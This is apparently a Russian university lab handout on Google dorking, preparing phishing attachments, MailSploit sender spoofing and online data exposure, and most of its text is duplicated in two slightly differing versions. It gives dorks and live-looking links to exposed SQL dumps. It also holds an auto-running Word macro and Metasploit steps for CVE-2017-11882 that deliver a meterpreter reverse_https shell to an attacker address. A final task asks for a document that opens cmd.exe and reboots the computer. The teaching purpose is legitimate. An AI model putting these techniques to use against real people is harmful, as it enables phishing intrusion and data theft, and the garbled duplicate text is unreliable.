Поиск только в тексте документа игнорируя адреса, хедеры, титлы и т.д.
Поиск только в тексте документа игнорируя адреса, хедеры, титлы и т.д.
Запрос:
Запрос:
```sh
```sh
intext:NS о матче Team Spirit
intext:"Кафедра занимает лидирующее место в области подготовки специалистов по теории управления, методам обработки данных и информационным технологиям, за время своего существования было подготовлено более 5000 инженеров, 300 кандидатов наук и 20 докторов наук."
```
```
Результат: https://bhf.su/threads/84305/
Результат:
"Привет! сегодня мы поговорим, о игре под названием dota 2!"
http://uit.mpei.ru/
"Кафедра управления и интеллектуальных технологий была создана в 1935 году. Кафедра занимает лидирующее место ..."
**FILETYPE**: или **EXT**:
FILETYPE: или EXT:
Поиск по расширению файла. Можно искать фотки, архивы, текстовые файлы, логи, базы данных и прочее.
Поиск по расширению файла. Можно искать фотки, архивы, текстовые файлы, логи, базы данных и прочее.
Пример: filetype:sql
Результат: http://www.victoriahelm.com/miburnsc_wrd2.sql (Да, да прям переходим и скачиваем дамп в формате .sql)
Пример:
INTITLE:
```sh
Поиск по сайтам между тегами <title>Найдем этот текст</title>
filetype:sql
CACHE:
```
Результат:
http://208.86.225.239/flitetech_4_2017.sql
(Дамп в формате `.sql`)
**INTITLE**:
Поиск по сайтам между тегами `<title>`Найдем этот текст`</title>`
**CACHE**:
Находит копию страницы даже если эта страница уже недоступна по адресу в Интернете или изменила свое содержание. Иными словами, эта команда проводит поиск в кэше Google.
Находит копию страницы даже если эта страница уже недоступна по адресу в Интернете или изменила свое содержание. Иными словами, эта команда проводит поиск в кэше Google.
INFO:
**INFO**:
Покажет страницу, содержащую ссылки на варианты поиска: поиск по похожим страницам, обратные ссылки, и страницы, содержащие такую же ссылку. Эта команда означает то же самое, что и вписать в строку поиска данный адрес веб-страницы.
Покажет страницу, содержащую ссылки на варианты поиска: поиск по похожим страницам, обратные ссылки, и страницы, содержащие такую же ссылку. Эта команда означает то же самое, что и вписать в строку поиска данный адрес веб-страницы.
LINK:
**LINK**:
Возвращает список страниц, которые ссылаются на заданный сайт.
Возвращает список страниц, которые ссылаются на заданный сайт.
RELATED:
**RELATED**:
Поиск страниц похожих на эту.
Поиск страниц похожих на эту.
- (минус)
Это знак исключения, то есть не искать или без этого текста. Обычно исключается -google -dev -git это девелоперские сайты.
" "(кавычки)
Искать точную фразу.
Примеры использования. Попробуйте выполнить их и просмотреть результаты поиска:
**Дополнительно**:
"-" (минус) - это знак исключения, то есть не искать или без этого текста. Обычно исключается -google -dev -git это девелоперские сайты.
" " (кавычки) - это искать точную фразу.
#### Примеры использования
Попробуйте выполнить их и просмотреть результаты поиска:
***В отчёте описать параметры запроса**
***После каждго запроса выполнить скриншот искомых данных (не ссылки в поисковом запросе Google)**
Для поиска дорков можно использовать специально созданную для этого базу – Google Hacking Database (GHDB - https://www.exploit-db.com/google-hacking-database/). Подробная статья, описывающая работу с данной базой - https://habrahabr.ru/post/283210/
Для поиска дорков можно использовать специально созданную для этого базу – Google Hacking Database (GHDB - https://www.exploit-db.com/google-hacking-database/). Подробная статья, описывающая работу с данной базой - https://habrahabr.ru/post/283210/
2.2. Подготовка атаки
### 2.2. Подготовка атаки
После поиска необходимой информации следует фаза подготовки атаки на пользователя. Очень часто это письмо, отправленное на почтовый ящик жертвы со звучным названием и содержанием («Приказ на исполнение», «Погашение задолженности», «Новый штраф ГИБДД» и т.д.) и безобидным вложением в виде документа (word, excel, rtf и т.д.) либо ссылкой на вредоносный сайт, содержащий уязвимость или фишинговую страницу.
После поиска необходимой информации следует фаза подготовки атаки на пользователя. Очень часто это письмо, отправленное на почтовый ящик жертвы со звучным названием и содержанием («Приказ на исполнение», «Погашение задолженности», «Новый штраф ГИБДД» и т.д.) и безобидным вложением в виде документа (word, excel, rtf и т.д.) либо ссылкой на вредоносный сайт, содержащий уязвимость или фишинговую страницу.
В данной лабораторной работе рассмотрим вариант создания документа Word, при открытии которого будет выполнен определенный код.
В данной лабораторной работе рассмотрим вариант создания документа Word, при открытии которого будет выполнен определенный код.
1. Откройте Microsoft Office Word
1. Откройте Microsoft Office Word
2. Нажмите комбинацию клавиш alt + F11, откроется окно редактирования макросов на языке Visual Basic
2. Нажмите комбинацию клавиш alt + F11, откроется окно редактирования макросов на языке Visual Basic
<imagesrc="assets/L4_1.jpg">
3. Нажмите два раза на документ (“ThisDocument”) в области “Project”.
3. Нажмите два раза на документ (“ThisDocument”) в области “Project”.
4. Выполните команду в командной строке:
4. Выполните команду в командной строке:
where calc.exe
`where calc.exe` и скопируйте полный путь к файлу
Скопируйте полный путь к файлу
5. Для выполнения кода при открытии документа необходимо объявить функцию Private Sub Document_Open() (в параметрах команды Shell необходимо передать путь к исполняемому файлу из предыдущего пункта:
5. Для выполнения кода при открытии документа необходимо объявить функцию Private Sub Document_Open():
```sh
Private Sub Document_Open()
Private Sub Document_Open()
RetVal = Shell("C:\Windows\System32\calc.exe", 1)
RetVal = Shell("C:\Windows\System32\calc.exe", 1)
End Sub
End Sub
В параметрах команды Shell необходимо передать путь к исполняемому файлу (получен в пункте 4.)
```
6. Сохраните файл в формате docm
6. Сохраните файл в формате docm
Теперь откройте созданный файл. При разрешающих политиках выполнения макросов, должен запуститься калькулятор.
Теперь откройте созданный файл. При разрешающих политиках выполнения макросов, должен запуститься калькулятор.
В данном примере была выполнена безобидная операция запуска калькулятора. Обычно это намного более сложная последовательность выполнения команд, в том числе загрузка исполняемого файла с серверов злоумышленников и последующий его запуск.
В данном примере была выполнена безобидная операция запуска калькулятора. Обычно это намного более сложная последовательность выполнения команд, в том числе загрузка исполняемого файла с серверов злоумышленников и последующий его запуск.
Это самый простой способ и защита от него – установка флага безопасности макросов в настройках приложений (возможно задать специальными политиками).
Более сложный способ – это использование одной из огромного количества уязвимостей в Microsoft Office. Пример использования такой уязвимости (CVE-2017-11882). Выполнять это не нужно, т.к. необходимого программного обеспечения на компьютерах лаборатории не установлено.
Эта ошибка была изначально замечена в октябре 2016 года. Все необходимое включено в Metasploit Framework. Metasploit помогает создать вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.
OLE— технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.
OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.
Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.
Пример использования (выполняется в Metasploit Framework):
Это самый простой способ и защита от него – установка флага безопасности макросов в настройках приложений (возможно задать специальными политиками).
Более сложный способ – это использование одной из огромного количества уязвимостей в Microsoft Office. Пример использования такой уязвимости (CVE-2017-11882).
Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой
Эта ошибка была изначально замечена в октябре 2016 года. Все необходимое включено в Metasploit Framework. Metasploit помогает создать вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.
set FILENAME /root/exp.rtf
Добавляем пейлоад и запускаем
**OLE** — технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.100 (адрес атакующего)
set lport 4443 (как обычно, можете выбирать почти любой)
exploit
На выходе получаем готовый файл, отправляем жертве (себе на виртуалку, т.к. используем в образовательных целях).
OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.
После запуска файла на системе, мы получим полный доступ в виде командной строки (powershell).
Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.
2.4. Атака
### 2.3. Атака
Для совершения атаки создаётся почтовый ящик, максимально похожий на ящик отправителя. Или, к примеру, имитирующий реально существующий адрес.
Для совершения атаки создаётся почтовый ящик, максимально похожий на ящик отправителя. Или, к примеру, имитирующий реально существующий адрес.
Как вариант возможно использовать уязвимости подмены адреса (названной MailSploit), информация о которой была опубликована 5 декабря 2017 года. В результате исполнения этой уязвимости возможно полностью подменить адрес отправителя.
Как вариант возможно использовать уязвимости подмены адреса (названной *MailSploit*), информация о которой была опубликована 5 декабря 2017 года. В результате исполнения этой уязвимости возможно полностью подменить адрес отправителя.
В сердце MailSploit лежит проблема, связанная с тем, как почтовые серверы интерпретируют email-адреса, закодированные с помощью RFC-1342. Данный стандарт был принят еще в 1992 году, он позволяет использовать отличные от ASCII символы в хедерах. Дело в том, что по правилам содержимое хедера должно состоять только из символов ASCII. В итоге авторы почтовых стандартов используют RFC-1342 для автоматической конвертации не-ASCII символов в стандартный формат ASCII, чтобы избежать возникновения ошибок, когда письмо, тема или адрес которого содержат не-ASCII символы, проходит через сервер.
В сердце MailSploit лежит проблема, связанная с тем, как почтовые серверы интерпретируют email-адреса, закодированные с помощью RFC-1342. Данный стандарт был принят еще в 1992 году, он позволяет использовать отличные от ASCII символы в хедерах. Дело в том, что по правилам содержимое хедера должно состоять только из символов ASCII. В итоге авторы почтовых стандартов используют RFC-1342 для автоматической конвертации не-ASCII символов в стандартный формат ASCII, чтобы избежать возникновения ошибок, когда письмо, тема или адрес которого содержат не-ASCII символы, проходит через сервер.
Большинство почтовых клиентов перекодируют RFC-1342 в привычный формат, но после не проверяют полученный результат на предмет вредоносности. Более того, если строка RFC-1342 содержит нулевой байт (null-byte) и более одного email-адреса, почтовый клиент распознает лишь адреса до нулевого байта, а все остальное останется «невидимым». Фактически, используя RFC-1342, атакующий может скрыть настоящий адрес письма, создав подделку, которую будет очень тяжело обнаружить. К примеру,
Большинство почтовых клиентов перекодируют RFC-1342 в привычный формат, но после не проверяют полученный результат на предмет вредоносности. Более того, если строка RFC-1342 содержит нулевой байт (null-byte) и более одного email-адреса, почтовый клиент распознает лишь адреса до нулевого байта, а все остальное останется «невидимым». Фактически, используя RFC-1342, атакующий может скрыть настоящий адрес письма, создав подделку, которую будет очень тяжело обнаружить. К примеру,
<imagesrc="assets/L4_3.jpg">
превратится в почтовом клиенте в:
превратится в почтовом клиенте в:
<imagesrc="assets/L4_4.jpg">
При этом красным цветом выделен настоящий домен, которого почтовый клиент «не видит». Клиент распознает только первый адрес, potus@whitehouse.gov, тогда как @mailsploit.com, располагается уже после нулевого байта (\0). Хуже того, таким же образом в поле «From:» можно спрятать вредоносный код, который в ряде случаев будет выполнен после расшифровки почтовым клиентом.
При этом красным цветом выделен настоящий домен, которого почтовый клиент «не видит». Клиент распознает только первый адрес, potus@whitehouse.gov, тогда как @mailsploit.com, располагается уже после нулевого байта (\0). Хуже того, таким же образом в поле «From:» можно спрятать вредоносный код, который в ряде случаев будет выполнен после расшифровки почтовым клиентом.
Как оказалось, перед проблемой уязвимы 33 почтовых клиента, включая Apple Mail (macOS, iOSи watchOS), Mozilla Thunderbird, ряд клиентов Microsoft, Yahoo Mail, ProtonMail и так далее. При этом лишь 8 из 33 в настоящее время выпустили патчи, еще 12 производителей вообще никак не отреагировали на сообщения специалиста.
Как оказалось, перед проблемой уязвимы 33 почтовых клиента, включая Apple Mail (macOS, iOSи watchOS), Mozilla Thunderbird, ряд клиентов Microsoft, Yahoo Mail, ProtonMail и так далее. При этом лишь 8 из 33 в настоящее время выпустили патчи, еще 12 производителей вообще никак не отреагировали на сообщения специалиста.
Таким образом жертва может получить вредоносный файл или ссылку в письме с абсолютно легитимным отправителем. Открыть данный файл и получить очень серьёзные проблемы.
Таким образом жертва может получить вредоносный файл или ссылку в письме с абсолютно легитимным отправителем. Открыть данный файл и получить очень серьёзные проблемы.
3. Что интернет знает о нас?
### 3. Что интернет знает о нас?
Все мы пользуемся сервисами google (поиском, youtube, картами, мобильными устройствами на базе Android и прочими сервисами). Так или иначе, но у Google остается огромное количество информации о наших действиях, которую они хранят. Как и кто пользуется этой информацией – хороший вопрос, который стоит задать себе. А что же знает о нас Google? Если у вас есть аккаунт в Google – можно легко проверить, какие данные о нас он знает, для этого достаточно залогиниться в свой аккаунт и перейти по ссылке - www.google.com/takeout . После перехода можно попробовать создать архив и посмотреть, какие данные хранятся в гугле (или какие данные нам предоставляют для выгрузки).
Все мы пользуемся сервисами google (поиском, youtube, картами, мобильными устройствами на базе Android и прочими сервисами). Так или иначе, но у Google остается огромное количество информации о наших действиях, которую они хранят. Как и кто пользуется этой информацией – хороший вопрос, который стоит задать себе. А что же знает о нас Google? Если у вас есть аккаунт в Google – можно легко проверить, какие данные о нас он знает, для этого достаточно залогиниться в свой аккаунт и перейти по ссылке - www.google.com/takeout . После перехода можно попробовать создать архив и посмотреть, какие данные хранятся в гугле (или какие данные нам предоставляют для выгрузки).
Другой пример – Facebook, а вернее группа компаний, так как ему принадлежит и Instagram и WhatsUp и много других сервисов. Для того, чтобы понять, какую информацию о нас собирает Facebook – можно зайти в разрешения, которые запрашивает приложение на вашем смартфоне. Их окажется достаточно много. Зачем Facebook столько данных о вас? И агрегирование этих данных с других приложений компании.
Другой пример – Facebook, а вернее группа компаний, так как ему принадлежит и Instagram и WhatsUp и много других сервисов. Для того, чтобы понять, какую информацию о нас собирает Facebook – можно зайти в разрешения, которые запрашивает приложение на вашем смартфоне. Их окажется достаточно много. Зачем Facebook столько данных о вас? И агрегирование этих данных с других приложений компании.
Далее немного об утечках – каждый день в мире кто-то ворует персональные данные пользователей с различных сайтов. Через уязвимости, через социальную инженерию, через инсайдеров в компаниях, много способов. Часто эти данные попадают в публичный доступ. К примеру, в телеграм-каналы:
Далее немного об утечках – каждый день в мире кто-то ворует персональные данные пользователей с различных сайтов. Через уязвимости, через социальную инженерию, через инсайдеров в компаниях, много способов. Часто эти данные попадают в публичный доступ. К примеру, в телеграм-каналы:
https://t.me/dataleak – публикует новости об утечках данных
https://t.me/dataleak – публикует новости об утечках данных
https://t.me/gitleaks - публикуют утечки корпоративных данных из github
https://t.me/gitleaks - публикуют утечки корпоративных данных из github
И другие, которые собирают утечки с различных ресурсов. Что если вы используете один и тот же пароль на нескольких сайтах и этот пароль окажется в одной из таких выборок?
И другие, которые собирают утечки с различных ресурсов. Что если вы используете один и тот же пароль на нескольких сайтах и этот пароль окажется в одной из таких выборок?
4. Задание
### 4. Задание
1) Через google dorks найти сайты с доменом .com где присутствует в адресе слово hack и с содержимым страницы где присутствует слово exploit.
2) Через google dorks найти сайты, которые используют панель управления phpmyadmin
***Результаты должны быть уникальные**
3) Через google dorks найти страницу своего профиля в социальной сети
4) Создать документ Microsoft Office, который при открытии запускает командную строку (cmd.exe).
1. Через google dorks найти сайты с доменом .com где присутствует в адресе слово hack и с содержимым страницы где присутствует слово exploit.
2. Через google dorks найти сайты, которые используют панель управления phpmyadmin
3. Через google dorks найти страницу своего профиля в социальной сети
4. Создать документ Microsoft Office, который при открытии запускает командную строку (cmd.exe) и выполняет перезагрузку компьютера.
